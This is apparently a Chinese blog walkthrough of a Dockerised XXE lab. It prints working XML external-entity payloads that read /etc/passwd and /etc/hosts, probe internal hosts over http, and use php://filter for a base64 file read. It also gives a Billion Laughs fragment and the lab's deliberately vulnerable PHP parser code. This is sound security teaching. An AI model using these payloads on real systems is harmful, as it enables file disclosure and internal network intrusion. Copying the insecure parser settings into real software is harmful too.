xxe靶场通关

最近已经复习完了ssrf,sql,xss靶场,现在我们来复习xee靶场。

目录

一、xxe漏洞介绍

二、靶场安装与通关

​编辑

1、通过file协议读取内容

2、通过fiel协议抓取主机信息

3、使用http协议探测内网或者攻击内网主机

[4、ftp://(类似 HTTP,访问 FTP 服务)](#4、ftp://(类似 HTTP,访问 FTP 服务))

5、gopher协议

6、php://协议


一、xxe漏洞介绍

xxe(XMl外部实体注入),使用的 XML 解析器未禁用外部实体(External Entity) ,攻击者可构造包含外部实体声明的 XML 数据,诱导解析器加载外部资源。

主要危害:

1)本地文件泄露:通过外部实体引用本地文件,如构造<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>,解析后可获取/etc/passwd内容。

2)内网探测:外部实体支持http://协议,如<!ENTITY xxe SYSTEM "http://192.168.1.200:8080">,可探测内网服务是否存活、端口是否开放。

3)DoS 攻击:通过 "亿笑攻击(Billion Laughs)" 构造循环引用的实体(如<!ENTITY a "aaa"><!ENTITY b "&a;&a;&a;">),导致解析器内存耗尽崩溃。

二、靶场安装与通关

此靶场使用docker进行安装,命令如下

bash 复制代码
docker pull rrodrigo/xxelab

然后运行靶场即可,命令如下

bash 复制代码
docker run -d --name="xxe" -p 9500:80 rrodrigo/xxelab

浏览器访问即可

1、通过file协议读取内容

我们先随便使用账号密码登录,然后抓包

可以清楚看到以xml来提交数据,那么就可以构造payload了,其payload语句如下所示

bash 复制代码
<?xml version="1.0"?>
<!DOCTYPE admin [
<!ENTITY test SYSTEM  "file:///etc/passwd">
]>
<root><name>&test;</name><tel>1</tel><email>1</email><password>1</password></root>

那么逐句解释一下此payload的意思,后面的攻击只要基于此构造即可。

XML 声明 <?xml version="1.0"?>表明这是一个 XML 1.0 版本的文档,是 XML 的标准开头。

DOCTYPE 声明与外部实体定义

复制代码
<!DOCTYPE admin [
<!ENTITY test SYSTEM  "file:///etc/passwd">
]>
  • <!DOCTYPE admin [...]>:定义了文档类型(DOCTYPE),名称为admin(可自定义),括号内是实体声明。
  • <!ENTITY test SYSTEM "file:///etc/passwd">:声明了一个外部实体(External Entity) ,名称为test,通过SYSTEM关键字指定实体的内容来自外部资源 ------file:///etc/passwd(Linux 系统中存储用户账户信息的敏感文件,包含用户名、UID、家目录等)。

XML 主体内容

bash 复制代码
<root><name>&test;</name><tel>1</tel><email>1</email><password>1</password></root>

<name>标签中,通过&test;引用了前面定义的外部实体test。此时,若解析该 XML 的服务器未禁用外部实体解析 ,会将/etc/passwd文件的内容替换到&test;的位置,最终导致<name>标签的值变为/etc/passwd的内容(例如root:x:0:0:root:/root:/bin/bash等用户信息)。

如下所示

没有信息,说明传递给<name>标签没有用,我们将&test;换到其它标签,最后测试换到<email>标签可以进行读取,如图所示

可以看到,我们已经成功读取到/etc/passwd的内容,那么我们可以怎么扩大危害呢,这里我们就可以使用协议来进行扩大危害了。

2、通过fiel协议抓取主机信息

使用命令如下

bash 复制代码
file:///etc/hosts

3、使用http协议探测内网或者攻击内网主机

bash 复制代码
http://172.17.0.2

因为这是单个靶场,无法完成其它的,但是其实在这里和ssrf一样都是可以通过http协议使用get请求来攻击内网,若是想要了解更加清楚的可以去看我的ssrf-labs靶场通关,里面有详细的教程。ssrf-labs靶场安装+通关(1)-CSDN博客

4、ftp://(类似 HTTP,访问 FTP 服务)

让目标服务器向 FTP 服务器发起请求,功能与 http:// 类似,可用于 SSRF 或读取 FTP 上的文件。由于此靶场没有ftp服务,所以无法做演示。

5、gopher协议

一款强大的协议,可以将用于请求方式post等,构造复杂的 TCP 数据包,攻击内部服务(如 Redis 未授权访问、SMTP 邮件伪造)。但是需要数据流,就是需要通过其url编码,并且其现代解析器支持较少,所以应用较少。在我的这两篇文章里面也是有详细的讲述的。ssrf-labs靶场安装+通关(1)-CSDN博客

ssrf-labs通关(2)-CSDN博客

6、php://协议

这个应该叫php伪协议,打过CTF应该都知道这个。php://PHP 专属的 "流包装器" (也被称为 "PHP 伪协议"),并非传统网络协议,而是 PHP 用于访问内部输入 / 输出流、内存、文件系统等资源的内部机制。但是需要在php环境下,并且再代码中需要有这样的逻辑

php 复制代码
// 读取 XML 中的外部实体,并通过 file_get_contents 处理
$xml = simplexml_load_string($postData);
$content = file_get_contents($xml->entity); // 假设 $xml->entity 是外部实体的值

当php存在这样的逻辑时,才能使用php伪协议。此靶场可以通过php协议来进行数据流的读取。

使用如下命令

php 复制代码
php://filter/read=convert.base64-encode/resource=/etc/passwd

输出结果以base64的进行编码,需要进行解码,如下所示

最后再附上靶场源码

php 复制代码
<?php
libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$info = simplexml_import_dom($dom);
$name = $info->name;
$tel = $info->tel;
$email = $info->email;
$password = $info->password;

echo "Sorry, $email is already registered!";
?>
相关推荐
空白诗12 分钟前
mdcat 在 HarmonyOS 上的构建与适配
后端·安全·华为·rust·harmonyos
红树林071 小时前
渗透测试之sql注入--报错注入
数据库·sql·安全·web安全
Xudde.2 小时前
Quick2靶机渗透
笔记·学习·安全·web安全·php
岁岁的O泡奶3 小时前
DVWA_Vulnerability: Command Injection
经验分享·安全·web安全
羑悻的小杀马特3 小时前
轻量跨云·掌控无界:Portainer CE + cpolar 让远程容器运维像点外卖一样简单——免复杂配置,安全直达对应集群
运维·网络·安全·docker·cpolar
我不是QI5 小时前
周志华《机器学习—西瓜书》二
人工智能·安全·机器学习
简道云平台5 小时前
缺货预警到底怎么做?终于有人把“安全库存”这件事讲清楚了
安全
AI绘画小337 小时前
Web 安全核心真相:别太相信任何人!40 个漏洞挖掘实战清单,直接套用!
前端·数据库·测试工具·安全·web安全·网络安全·黑客
北京耐用通信7 小时前
告别“牵一发而动全身”:耐达讯自动化Profibus PA分线器为石化流量计网络构筑安全屏障
人工智能·网络协议·安全·自动化·信息与通信
galaxylove8 小时前
Gartner发布2025年人工智能和网络安全技术成熟度曲线:网络安全领域对AI的期望值达到顶峰
人工智能·安全·web安全